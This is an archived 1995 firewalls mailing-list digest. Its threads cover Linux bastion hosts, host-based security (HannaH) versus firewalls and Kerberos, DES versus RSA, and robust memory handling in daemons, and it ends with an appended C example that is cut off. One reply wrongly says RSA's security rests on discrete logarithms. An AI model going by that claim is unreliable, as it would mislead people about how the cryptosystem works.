From firewalls-owner Fri Sep 1 05:30:12 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA23523 for firewalls-outgoing; Fri, 1 Sep 1995 05:21:57 -0700
Received: from imonics.com (netadmin.imonics.com [192.154.44.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA23516 for ; Fri, 1 Sep 1995 05:21:53 -0700
Received: from faraday.imonics.com (faraday.imonics.com [205.139.210.246]) by imonics.com (8.6.12/8.6.12) with SMTP id IAA14587 for ; Fri, 1 Sep 1995 08:20:26 -0400
From: James Brigman - Imonics Development
Received: by faraday.imonics.com (5.x/SMI-SVR4) id AA00605; Fri, 1 Sep 1995 08:20:21 -0400
Date: Fri, 1 Sep 1995 08:20:21 -0400
Message-Id: <9509011220.AA00605@faraday.imonics.com>
To: firewalls@greatcircle.com
Subject: Re: Linux distributions
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Thu, 31 Aug 1995, Andrew Foss wrote:

> I've a need for a Linux bastion host to relay mail. The only distribution
> I've worked with is Yggdrasil?sp?
> Does anyone with more Linux experience than I, have any preference for one
> version over another? If so, where can I get it, I'm not on any Linux
> mailing lists.

Personal Experiences:

- yggdrasil lags some of the other releases
- their mscdex driver never worked with Mitsumi 4x IDE cdrom
- this information applies to the "fall 94" release of yggdrasil
- Avoid the "fall 94" Yggdrasil release

Now using Slackware (1.2.3 kernel) and Red Hat
- Both install very differently
- Good success with both
- Red Hat comes with some pretty nice tools
- Slackware=PHT April 1995 and Red Hat "Mother's Day" Release
- New Red Hat in the works.

I haven't run a firewall with either, but there are active discussions on the mailing lists for both. URL: www.redhat.com and www.pht.com.

Gud Luk...
From firewalls-owner Fri Sep 1 06:02:41 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA24429 for firewalls-outgoing; Fri, 1 Sep 1995 06:00:38 -0700
Received: from imonics.com (netadmin.imonics.com [192.154.44.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA24414 for ; Fri, 1 Sep 1995 06:00:35 -0700
Received: from faraday.imonics.com (faraday.imonics.com [205.139.210.246]) by imonics.com (8.6.12/8.6.12) with SMTP id IAA15195 for ; Fri, 1 Sep 1995 08:59:09 -0400
From: James Brigman - Imonics Development
Received: by faraday.imonics.com (5.x/SMI-SVR4) id AA00624; Fri, 1 Sep 1995 08:59:04 -0400
Date: Fri, 1 Sep 1995 08:59:04 -0400
Message-Id: <9509011259.AA00624@faraday.imonics.com>
To: firewalls@greatcircle.com
Subject: Re: Linux distributions
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> James Brigman - Imonics Development wrote this:
> >
> > - Slackware=PHT April 1995 and Red Hat "Mother's Day" Release
>
> Hi -- I've run various Slackware releases for a couple of years and
> haven't heard of "PHT". What does that stand for?
>
> Thanks!
> -Bill
>
> --
> Bill Heiser, Individual, Inc., Network Services
> billh@individual.com (home: bill@bh.org, http://www.bh.org/)

Bill:

"PHT" is Pacific Hi-Tech. They are a distributor of a very inexpensive two CD-ROM version of Slackware. They also have a nice reprint of the Matt Welsh documentation.
Please forgive the bandwidth: I have no connection to PHT commercial or otherwise....JKB

From firewalls-owner Fri Sep 1 06:30:29 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA25206 for firewalls-outgoing; Fri, 1 Sep 1995 06:25:00 -0700
Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA25199; Fri, 1 Sep 1995 06:24:57 -0700
Message-Id: <199509011324.GAA25199@miles.greatcircle.com>
Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA278111325; Fri, 1 Sep 1995 09:15:25 -0400
Date: Fri, 1 Sep 1995 09:15:25 -0400
From: gary flynn
To: gary@habanero.jmu.edu, isdmill@gatekeeper.ddp.state.me.us
Subject: Re: HannaH from SecureWare Inc.
Cc: adm_lcorea@vax1.acs.jmu.edu, firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, foxtrot@sware.com, oit_cathy@vax1.acs.jmu.edu, oit_charles@vax1.acs.jmu.edu, oit_dbh@vax1.acs.jmu.edu, shan.bell@sware.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> > This Hannah product looks like what I've been looking for. It puts
> > "network security" where it belongs...on the nodes. I liken this
> > to putting locks on building doors rather than gates across
> > heavily traveled roads. Then the communications infrastructure
> > can be upgraded and used as intended...as a communications highway.
> > Problems with firewall throughput go away.
>
> [...]
>
> > Is anyone else excited about this product or am I missing something?
>
> I'm not familiar with this particular product. That said, I'd like to
> address a couple of points that you make about it.
>
> First, there's the possibility that people will not use the product, or
> that their product will not fit all types, styles, and rev levels of
> computer on your network. Once one of the systems on your network is
> compromised it becomes a safe staging area for attacks on the rest of
> your network. Which leads us to ...
>

Policy should take care of what people use. If policy is ignored, then you won't have much security no matter what you do. The product is limited to winsock, hpux, and SCO right now but good products have a habit of being rapidly ported. If the critical systems are protected individually, it's less disastrous if a non-critical system gets compromised. This isn't true of a "soft chewy center".

> Second, the whole reason people put the soft chewy center in the middle
> of a very hard shell is so there is a single access point to be
> administered. It's one thing to get a good security person to
> manage/monitor the firewall through which all traffic flows. It's
> another thing altogether (usually thought impossible in any sizeable
> installation) to try and have many administrators adequately secure their
> systems.
>

Hannah is centrally administered although you have to install the product on all the platforms. So there is a central security administrator. Software distribution, installation, and configuration management mechanisms and policies need to exist for network/node management anyway, so the addition of one more product shouldn't negate the overall concept.
gary

From firewalls-owner Fri Sep 1 07:00:47 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA25898 for firewalls-outgoing; Fri, 1 Sep 1995 06:53:12 -0700
Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA25891 for ; Fri, 1 Sep 1995 06:53:09 -0700
From: long-morrow@CS.YALE.EDU
Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU via ESMTP; Fri, 1 Sep 1995 09:51:28 -0400
Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.6.12/res.client.cf-3.7) id JAA02782; Fri, 1 Sep 1995 09:51:26 -0400
Date: Fri, 1 Sep 1995 09:51:26 -0400
Message-Id: <199509011351.JAA02782@SPARKY.CF.CS.YALE.EDU>
To: firewalls@greatcircle.com, teck@ms.mimos.my
Subject: Re: comparison study between DES and RSA
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

From: Lee Hooi Teck wrote:
>I am looking into network security currently and found that most of the
>products use either DES or RSA for authentication and encryption.
>
>Is there any info or document that has mentioned the pros and cons of
>these two types of cryptosystems? How are these technologies being used in
>digital signature?
>
>Hope that there is info for the export issue on these two systems as well.

There are three recent books which cover cryptosystems, digital signatures and related material in some detail:

1. "Applied Cryptography" by Bruce Schnier (sp?)
2. "Network Security - PRIVATE Communication in a PUBLIC World", by Charles Kaufman, Radia Perlman and Mike Speciner
3. and Stallings' new book which has a title which looks something like "Network and Internetwork Security"

- Morrow

From firewalls-owner Fri Sep 1 07:02:40 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA25605 for firewalls-outgoing; Fri, 1 Sep 1995 06:45:03 -0700
Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA25590; Fri, 1 Sep 1995 06:44:58 -0700
Message-Id: <199509011344.GAA25590@miles.greatcircle.com>
Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA280182528; Fri, 1 Sep 1995 09:35:29 -0400
Date: Fri, 1 Sep 1995 09:35:29 -0400
From: gary flynn
To: alan@mid.net, isdmill@gatekeeper.ddp.state.me.us
Subject: Re: HannaH from SecureWare Inc.
Cc: adm_lcorea@vax1.acs.jmu.edu, firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, foxtrot@sware.com, gary@habanero.jmu.edu, oit_cathy@vax1.acs.jmu.edu, oit_charles@vax1.acs.jmu.edu, oit_dbh@vax1.acs.jmu.edu, shan.bell@sware.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Alan Hannan wrote:

> -dm-]
> -dm-] On Thu, 31 Aug 1995, gary flynn wrote:
> -dm-]
> gflynn] This Hannah product looks like what I've been looking for. It puts
> gflynn] "network security" where it belongs...on the nodes. I liken this
> gflynn] to putting locks on building doors rather than gates across
> gflynn] heavily traveled roads. Then the communications infrastructure
> gflynn] can be upgraded and used as intended...as a communications highway.
> gflynn] Problems with firewall throughput go away.
>
> Sure, let's just open up the bloody borders of our country to anyone, we
> wouldn't want to impede any travel, would we? Heaven forbid Iraqis should
> actually have to stop at the border to our country, we should allow
> them and all others to come in unimpeded. Geez.
>

Then again if you have to go through customs in everyday affairs across the neighborhood, it makes getting work done a bit tedious.
Not to mention the inefficiencies in upgrading to newer, faster communications technology, protocols, or products. If they can't access anything once inside the border, what's the harm? The whole point is protecting assets.

But enough with the highway analogy. Given that a network is a group of interconnected computing devices, then "network security" doesn't necessarily mean data communications security. It means the resources connected to the data communications are secure. I think it would be better to secure the resources in some central way than to impede the data communications. If the node is protected from access and its communications with other nodes are authenticated and encrypted, doesn't this solve the problem?

> gflynn] Is anyone else excited about this product or am I missing something?
> -dm-]
> -dm-] I'm not familiar with this particular product. That said, I'd like to
> -dm-] address a couple of points that you make about it.
> -dm-]
> -dm-] Second, the whole reason people put the soft chewy center in the middle
> -dm-] of a very hard shell is so there is a single access point to be
> -dm-] administered. It's one thing to get a good security person to
> -dm-] manage/monitor the firewall through which all traffic flows. It's
> -dm-] another thing altogether (usually thought impossible in any sizeable
> -dm-] installation) to try and have many administrators adequately secure their
> -dm-] systems.
>
> Quite obviously, one that thinks individual host security should have
> more emphasis than network security has never tried to implement such a
> policy. More clearly, one who thinks indiv. hosts are more important
> than network security has no concept of time=money.
>

I thought the intention of "network security" was to protect individual hosts. Implementation of host based security is hampered by the necessity to administer hosts with inherently poor security.
If good products are embedded into the operating systems of the hosts, the implementation should prove much easier and more effective.

Gary Flynn
Network Manager
James Madison University

> --
> Alan Hannan                      Email: alan@mid.net
> Network Systems Administrator    Voice: (402) 472-0239
> MIDnet, Lincoln NOC Office       Fax: (402) 472-0240
>
> " [sometimes] the game of outsmarting the supervisor is
> more interesting than the work itself " - Quinn Mills
>

From firewalls-owner Fri Sep 1 07:30:19 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA26706 for firewalls-outgoing; Fri, 1 Sep 1995 07:18:32 -0700
Received: from yage.tembel.org (yage.tembel.org [206.43.170.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA26699 for ; Fri, 1 Sep 1995 07:18:26 -0700
Received: by yage.tembel.org (Smail3.1.29.1 #9) id m0soWtu-000DPEC; Fri, 1 Sep 95 14:16 GMT
Message-Id:
From: shields@tembel.org (Michael Shields)
Subject: Re: HannaH from SecureWare Inc.
To: gary@habanero.jmu.edu (gary flynn)
Date: Fri, 1 Sep 1995 14:16:57 +0000 (GMT)
Cc: gary@habanero.jmu.edu, firewalls-digest@GreatCircle.COM
In-Reply-To: from "gary flynn" at 1995-09-01 10:00:21
X-Dogma: Microsoft is not the answer. Microsoft is the question. No is the answer.
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Content-Length: 1066
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> My (admittedly limited) understanding of Kerberos leads me
> to believe the following:
>
> 1. Kerberos requires modification of each application that
> it's to be used with. Hence limited support. Hannah allows
> the use of any application using standard winsock or
> socket library calls on supported platforms.

This is true, but it's necessary when you replace the authentication mechanism at the protocol level. Is HannaH providing link-layer encryption on a host-to-host level?

> 2. Kerberos doesn't encrypt the data. Hannah can.

Kerberos can.
> 3. Hannah's "certificate diskette" for each user solves
> some problems that Kerberos has on desktop machines.

This is too vague. Kerberos works by having a ticket-granting ticket, a sort of master metaticket, which is sent from the Kerberos server encrypted in the user's passphrase. If the user can decrypt it (by giving the correct passphrase), he can get tickets which authenticate him to various services. If you describe the "certificate diskette" I can see how it compares.
--
Shields.

From firewalls-owner Fri Sep 1 07:32:40 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA26528 for firewalls-outgoing; Fri, 1 Sep 1995 07:09:59 -0700
Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA26521 for ; Fri, 1 Sep 1995 07:09:50 -0700
Message-Id: <199509011409.HAA26521@miles.greatcircle.com>
Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA282694021; Fri, 1 Sep 1995 10:00:21 -0400
Date: Fri, 1 Sep 1995 10:00:21 -0400
From: gary flynn
To: gary@habanero.jmu.edu, shields@yage.tembel.org
Subject: Re: HannaH from SecureWare Inc.
Cc: firewalls-digest@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> > This Hannah product looks like what I've been looking for. It puts
> > "network security" where it belongs...on the nodes. I liken this
> [...]
> > It seems so simple that someone else would have thought of it sooner.
>
> Kerberos. It's been available for many years, it's an open standard,
> it's cross-platform, it's extensible, it's featureful, and the protocol
> has been formally proven.
>
> I don't see what HannaH provides that Kerberos doesn't, except that
> it's proprietary.
> --
> Shields.
>

My (admittedly limited) understanding of Kerberos leads me to believe the following:

1. Kerberos requires modification of each application that it's to be used with. Hence limited support.
Hannah allows the use of any application using standard winsock or socket library calls on supported platforms.

2. Kerberos doesn't encrypt the data. Hannah can.

3. Hannah's "certificate diskette" for each user solves some problems that Kerberos has on desktop machines.

gary

From firewalls-owner Fri Sep 1 08:00:25 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA26459 for firewalls-outgoing; Fri, 1 Sep 1995 07:06:33 -0700
Received: from POWERED.ZOO.CS.YALE.EDU (ZOO-GW.CS.YALE.EDU [128.36.0.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA26452 for ; Fri, 1 Sep 1995 07:06:29 -0700
Received: from FROG.ZOO2.CS.YALE.EDU by POWERED.ZOO.CS.YALE.EDU (5.67b/res.host.cf-3.5) with SMTP id AA38296; Fri, 1 Sep 1995 10:05:05 -0400
Received: by FROG.ZOO2.CS.YALE.EDU (Sendmail-5.67b/res.client.cf-3.5) id AA14448; Fri, 1 Sep 1995 10:04:51 -0400
Date: Fri, 1 Sep 1995 10:04:51 -0400 (EDT)
From: "Rev. Ben"
To: Lee Hooi Teck
Cc: firewalls@greatcircle.com
Subject: Re: comparison study between DES and RSA
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 1 Sep 1995, Lee Hooi Teck wrote:

> Hi,

Hi Lee.

> I am looking into network security currently and found that most of the
> products use either DES or RSA for authentication and encryption.

They're usually coupled for reasons below.

> Is there any info or document that has mentioned the pros and cons of
> these two types of cryptosystems? How are these technologies being used in
> digital signature?

DES and RSA are complementary cryptosystems. RSA was invented to be a Public Key Algorithm. This means that it is asymmetric--i.e. that a different key is used for decryption (private key) than for encryption (public key). RSA is very slow, but is used primarily for the secure exchange of keys to faster symmetric block ciphers.
RSA keys can also be an arbitrary length in order to make it as secure as you like. RSA derives its security from the difficulty of doing a discrete logarithm in a finite field.

DES is a symmetric block cipher that uses the same key in both encryption and decryption. It can be very fast to implement in hardware, and derives its security, not from the difficulty of discrete but from being a secure cryptosystem. The key is 56 bits long (8 bytes with the high bit stripped).

> Hope that there is info for the export issue on these two systems as well.

You can get them both off-shore (out of the US)--try hacktic.nl or a yahoo search off shore.

> Thanks in advance for the help.

Certainly.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant, and kindness from the unkind; yet, strange, I am ungrateful to those teachers.-- K. Gibran.
SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net http://www.netresponse.com/zldf
PGP encrypted mail welcomed--finger samman@cs.yale.edu for public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMEcS/b5ALmeTVXAJAQGLbAL/d/+be65OJgUgDGSzL1u7n0ikIB8Z4zpO
GixYKTLdVKDKsnhlhT2XRV4Tj+BedV6sMyRPiq87TnC8kOivoC0Qx52U4eNUvVol
zT60E6yXSJxEs/Aum1ckATFaJQ5Ic7+N
=Co9C
-----END PGP SIGNATURE-----

From firewalls-owner Fri Sep 1 08:30:23 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA29439 for firewalls-outgoing; Fri, 1 Sep 1995 08:25:29 -0700
Received: from phillipe.jmu.edu (phillipe.jmu.edu [134.126.71.226]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA29427; Fri, 1 Sep 1995 08:25:20 -0700
Received: by phillipe.jmu.edu (1.37.109.4/16.2) id AA05741; Fri, 1 Sep 95 11:22:21 -0400
Date: Fri, 1 Sep 1995 11:22:21 -0400 (EDT)
From: Charles Cooley
To: Alan Hannan
Cc: David Miller , Gary Flynn ,
    firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, adm_lcorea@VAX1.ACS.JMU.EDU, foxtrot@sware.com, oit_cathy@VAX1.ACS.JMU.EDU, oit_charles@VAX1.ACS.JMU.EDU, oit_dbh@VAX1.ACS.JMU.EDU, shan.bell@sware.com
Subject: Re: HannaH from SecureWare Inc.
In-Reply-To: <199508312229.RAA29405@gaijin.mid.net>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I should know better than to get into my supervisor's discussion with his boss on the CC: list, but ...

Legend:
  alan]   is Alan Hannan
  -dm-]   is David Miller
  gflynn] is Gary Flynn

-dm-] I'm not familiar with this particular product. That said, I'd like to
-dm-] address a couple of points that you make about it.
...
-dm-] Second, the whole reason people put the soft chewy center in the middle
-dm-] of a very hard shell is so there is a single access point to be
-dm-] administered. It's one thing to get a good security person to
-dm-] manage/monitor the firewall through which all traffic flows. It's
-dm-] another thing altogether (usually thought impossible in any sizeable
-dm-] installation) to try and have many administrators adequately secure
-dm-] their systems.

Troy had strong walls and a decent army and so believed they were safe. A more vigilant night watch was called for since the city was surrounded. "Soft chewy centers" behind a single line of defense are very dangerous.

gflynn] This Hannah product looks like what I've been looking for. It puts
gflynn] "network security" where it belongs...on the nodes. I liken this
gflynn] to putting locks on building doors rather than gates across
gflynn] heavily traveled roads. Then the communications infrastructure
gflynn] can be upgraded and used as intended...as a communications highway.
gflynn] Problems with firewall throughput go away.

alan] Sure, let's just open up the bloody borders of our country to anyone, we
alan] wouldn't want to impede any travel, would we?
alan] Heaven forbid Iraqis
alan] should actually have to stop at the border to our country, we should
alan] allow them and all others to come in unimpeded. Geez.

While I agree that firewalls are an important defense to provide overall site security, it's not enough. The impression that I am getting from the two responses to Gary's message is that firewall and other network security are significantly more important than individual host security mechanisms. The national border analogy provides a natural counter argument. Even countries with a strong military and secure borders still maintain an internal police force, and in larger communities individuals make sure that their door is locked. HannaH is designed to provide the "internal" security that most firewall based security strategies don't address. A significant portion of the security breaches are not from "foreigners" but from discontented and anti-social "natives" in the electronic world.

gflynn] Is anyone else excited about this product or am I missing something?

alan] Quite obviously, one that thinks individual host security should have
alan] more emphasis than network security has never tried to implement such a
alan] policy. More clearly, one who thinks indiv. hosts are more important
alan] than network security has no concept of time=money.

I believe that HannaH should be viewed as an alternative to Virtual LAN security schemes instead of firewalls, and one of the complaints about Virtual LANs is maintainability. If you want to talk about time and money and their relation to the size of the network, don't forget that a larger network means a larger center.

One of HannaH's advantages is that it provides a mechanism to provide security based on the identity of a person rather than a host. The old Internet concept of host is out of date. Hosts were multi-user systems owned and MANAGED by organizations and individual people were authenticated by those hosts.
With the proliferation of PC class systems, many systems connected to networks are single user systems. The old assumptions about security (like the "secure" ports below 512/1024) can be very dangerous.

On our campus, we are already doing packet filtering at the routers, and eavesdrop protection, etc. at the hubs. In our environment, the same network and even the same machine may be used by students, faculty and staff for any number of different tasks. A mixed population which can not be physically separated poses a problem that is significantly more complex than the "us" vs "them" situation.

Charles Cooley
Network Analyst

From firewalls-owner Fri Sep 1 08:32:40 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA29391 for firewalls-outgoing; Fri, 1 Sep 1995 08:23:16 -0700
Received: from yage.tembel.org (yage.tembel.org [206.43.170.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA29383 for ; Fri, 1 Sep 1995 08:23:06 -0700
Received: by yage.tembel.org (Smail3.1.29.1 #9) id m0soXuT-000DS5C; Fri, 1 Sep 95 15:21 GMT
Message-Id:
From: shields@tembel.org (Michael Shields)
Subject: Re: HannaH from SecureWare Inc.
To: gary@habanero.jmu.edu (gary flynn)
Date: Fri, 1 Sep 1995 15:21:35 +0000 (GMT)
Cc: firewalls@greatcircle.com
In-Reply-To: from "gary flynn" at 1995-09-01 10:29:39
X-Dogma: Microsoft is not the answer. Microsoft is the question. No is the answer.
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Content-Length: 2677
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> I think I'll save us both some time and just point you at
> their web page. There is a white paper there that seems
> fairly comprehensive. With your understanding of Kerberos,
> you may be able to draw better comparisons than if I
> try and send you second hand information. I would appreciate
> your opinion of the product if you get a chance to look
> at it, though.
>
> www.sware.com/papers/hannah

Based on that white paper, an analysis:

HannaH requires key distribution on read-only floppies, which contain a key "wrapped" (encrypted) in the user's password. This is a primitive attempt at two-factor authentication, but since floppies can be copied, it seems a poor one. It also rules out many portables which have no floppy drives. Finally, as long as you require the user to carry something, why not something like a smart token, which can prove that the user holds it?

HannaH provides authorization and logging mechanisms. Kerberos, per se, does not; it only provides authentication and integrity. While this isn't necessarily a bad architecture, taking access control out of the hands of the protocol does break many assumptions in protocols designed for Internet use. I think that because of this, many common applications will have to be modified for HannaH anyway.

HannaH claims transparency. I don't know what mechanism they use, so I can't comment on if it is robust when communicating with non-HannaH endpoints.

HannaH only protects TCP. Kerberos protects anything.

I don't see a formal description of the HannaH protocol. Is it proprietary? Kerberos is public, and has even been formally proven.

HannaH works "in direct opposition to many security efforts in the networking standards communities" (their words!). Because of this I don't know if the protocol is secure.

Kerberos allows a tree or mesh of servers for distributed management. Kerberos allows redundant servers. HannaH seems to have one per "organization" and no inter-realm communication.

The list at the end of the "what is unique about HannaH?" section seems to boil down to "HannaH doesn't have clear abstraction boundaries and thus is better than these individual services that do one thing each". This isn't clear thinking.

Overall, I'd say as a first impression, that HannaH tries to be many things but doesn't convince me it does any of them especially well.
It will probably find some market as a package solution but seems inferior to Kerberos plus management tools. (Kerberos could use someone to package it up as a security solution, since it's an excellent protocol.)

I'd appreciate a comparison of HannaH vs. IPSEC by someone who knows about IPSEC.
--
Shields.

From firewalls-owner Fri Sep 1 09:02:02 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA29252 for firewalls-outgoing; Fri, 1 Sep 1995 08:17:00 -0700
Received: from gatekeeper.ddp.state.me.us (gatekeeper.ddp.state.me.us [141.114.130.70]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA29240; Fri, 1 Sep 1995 08:16:56 -0700
Received: from localhost by gatekeeper.ddp.state.me.us (8.6.5/1.37) id LAA05189; Fri, 1 Sep 1995 11:10:04 -0400
Date: Fri, 1 Sep 1995 11:10:03 -0400 (EDT)
From: David Miller
Subject: Re: HannaH from SecureWare Inc.
To: gary flynn
cc: gary@habanero.jmu.edu, adm_lcorea@vax1.acs.jmu.edu, firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, foxtrot@sware.com, oit_cathy@vax1.acs.jmu.edu, oit_charles@vax1.acs.jmu.edu, oit_dbh@vax1.acs.jmu.edu, shan.bell@sware.com
In-Reply-To: <199509011318.JAA27684@gatekeeper.ddp.state.me.us>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 1 Sep 1995, gary flynn wrote:

> >
> > > This Hannah product looks like what I've been looking for. It puts
> > > "network security" where it belongs...on the nodes. I liken this
> > > to putting locks on building doors rather than gates across
> > > heavily traveled roads. Then the communications infrastructure
> > > can be upgraded and used as intended...as a communications highway.
> > > Problems with firewall throughput go away.
> >
> > [...]
> >
> > > Is anyone else excited about this product or am I missing something?
> >
> > First, there's the possibility that people will not use the product, or
> > that their product will not fit all types, styles, and rev levels of
> > computer on your network. Once one of the systems on your network is
> > compromised it becomes a safe staging area for attacks on the rest of
> > your network. Which leads us to ...
> >
>
> Policy should take care of what people use. If policy is ignored, then
> you won't have much security no matter what you do. The product is

That may be a justification, but it's not reality. There's a big difference between passively not following a policy by putting up a new product (Win 95 maybe) for which no security piece yet exists, and actively not following policy by a user maliciously establishing an outbound tcp connection to a remote host and passing all your confidential data out. Putting up a firewall secures the systems within which are run by well meaning but ignorant people. (From the external network, of course, not from all possible attacks).

> limited to winsock, hpux, and SCO right now but good products have a
> habit of being rapidly ported. If the critical systems are protected
> individually, it's less disastrous if a non-critical system gets
> compromised. This isn't true of a "soft chewy center".

And what happens when users try something different?

BTW "winsock" is an API, not a particular product. It's like saying TCP instead of SCO. Those systems running winsock could be windows, or NT servers, on win95 products. Could be running twinsock, for that matter.

>
> > Second, the whole reason people put the soft chewy center in the middle
> > of a very hard shell is so there is a single access point to be
> > administered. It's one thing to get a good security person to
> > manage/monitor the firewall through which all traffic flows. It's
> > another thing altogether (usually thought impossible in any sizeable
> > installation) to try and have many administrators adequately secure their
> > systems.
> >
>
> Hannah is centrally administered although you have to install the
> product on all the platforms. So there is a central security
> administrator. Software distribution, installation, and configuration
> management mechanisms and policies need to exist for network/node
> management anyway, so the addition of one more product shouldn't
> negate the overall concept.

If you say so. I rather like the earlier analogy to letting the Iraqis roar down the highway because all the houses are locked.

--- David
----------------------------------------------------------------------------
It's *amazing* what one can accomplish when one doesn't know what one can't do!

From firewalls-owner Fri Sep 1 09:30:45 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA01436 for firewalls-outgoing; Fri, 1 Sep 1995 09:03:39 -0700
Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA01421 for ; Fri, 1 Sep 1995 09:03:30 -0700
Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id LAA20412; Fri, 1 Sep 1995 11:18:20 -0500
Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id LAA20408; Fri, 1 Sep 1995 11:18:19 -0500
Received: from hector.sctc.com (hector.sctc.com [172.17.192.85]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id LAA16935; Fri, 1 Sep 1995 11:02:05 -0500
Received: (from stockwel@localhost) by hector.sctc.com (8.6.12/8.6.9) id LAA07632; Fri, 1 Sep 1995 11:02:03 -0500
Date: Fri, 1 Sep 1995 11:02:03 -0500
From: Ted Stockwell
Message-Id: <199509011602.LAA07632@hector.sctc.com>
To: shields@tembel.org (Michael Shields)
Cc: firewalls@GreatCircle.COM
Subject: Re: FW: Programming
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> From: shields@tembel.org (Michael Shields)
> Date: Fri, 1 Sep 1995 01:52:10 (GMT)
>
> > It is a pain to always check for "NULL" after
attempting to allocate memory > > and to check for buffer overflows. Makes code downright hard to read since > > the flow of the program is cluttered with error checks. Yet, I depend on all > > this 'extra' code to make sure that people can't crash my firewall by > > overflowing memory with long lines, enormous mail recipient lists, busted > > network packets, and such. We all depend on our vendors doing reliable error > > handling and "failing safely". > > In something like allocating memory, where a failure is always fatal, > you can easily write an xmalloc() that is that a wrapper which either > returns a non-NULL pointer or dies. Then always call that instead of > straight malloc(). This is fairly easy. if a malloc() failure is fatal to the program, then denial of service attacks on long running daemons become easier. Flood them until they choke on memory resources and then they're gone. When possible, you want to fail the single transaction that depleted memory, but keep running -- resources may become available later when the system is less busy. (Obviously, there are applications where this is not possible/desireable.) > I always check *every* system call and most library routines as well. > It's part of my negative-space philosophy to coding -- you want to > disallow all the actions that are not part of what you want to accomplish. > It works beautifully. Maybe we can get launch a successful crusade to rewrite every useful piece of code with such good practices. But until that time, you need other security mechanisms to secure this useful, but less trustworthy, legacy code. 
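The trade-off Ted Stockwell describes above, an xmalloc() that exits the process versus failing only the transaction that ran out of memory, as an added example in C. This is an editor-written illustration, not code from the post, from Michael Shields or from Sidewinder; the per-transaction arena (`struct txn`, `txn_alloc`, `txn_end`), the 4096-byte budget and the sample recipient lists are all constructed for the demonstration.

```c
/* Added example (not from the list post): two ways a long-running daemon
 * can react to malloc() failure. xmalloc() exits the process, so anyone who
 * can exhaust memory takes the whole service down; txn_alloc() charges
 * allocations to a per-transaction budget and fails only that transaction. */
#include <stdio.h>
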